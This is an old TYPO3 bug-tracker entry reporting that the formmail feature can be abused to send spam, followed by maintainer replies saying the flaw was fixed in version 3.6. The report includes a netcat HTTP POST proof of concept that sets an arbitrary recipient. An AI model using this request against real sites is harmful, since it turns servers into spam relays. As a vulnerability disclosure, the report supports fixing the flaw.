Bug #14265
closed
formmail can be abused to send spam
0%
Description
Getting typo3 to send emails to arbirtary email adresses is as easy as typing in
---------------------------------------------
netcat -w 1 localhost 80 <<EOF
POST /index.php HTTP/1.1
Host: localhost
Referer: http://localhost/
Cookie: fe_typo_user=1bedf7ad7f
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
subject=&recipient=me%40privacy.net&locationData=13%3Att_content%3A14&name=&formtype_mail=1
EOF
---------------------------------------------
on the console. The recipient can be set completely arbitrary!
[To reproduce, you have to replace "localhost" by an actual typo3 installation and get a coocie from the server.]
Insecure formail installations are routinely exploited by spammers to send massive amounts of emails.
I see two ways to fix this: Calculate a sha1 hash of all hidden fields in the form and a secret string and use this in another hidden form field. On return of the form, check the sha1 hash.
Or (even better): Don't put the recipient email address in the form but fetch it from the database.
(issue imported from #M278)
Updated by Ingmar Schlecht over 20 years ago
This issue has been spoken about in the dev list already.
Maybe Jan-Erik can give a comment on the current status of that.
Updated by Jan-Erik Revsbech over 20 years ago
This is well known, and have been fixed in version 3.6 exactly the way you mention by calulating a hash of the recipient address.
I don't think that version 3.5.0 is being bugfixed anymore (Please correct me if I'm wrong) At least I havent seen any 3.5.1 patches...
I can see that its a big problem, so if there will ever be talk about releasing a 3.5.1 patch, I will implement the check in that patch.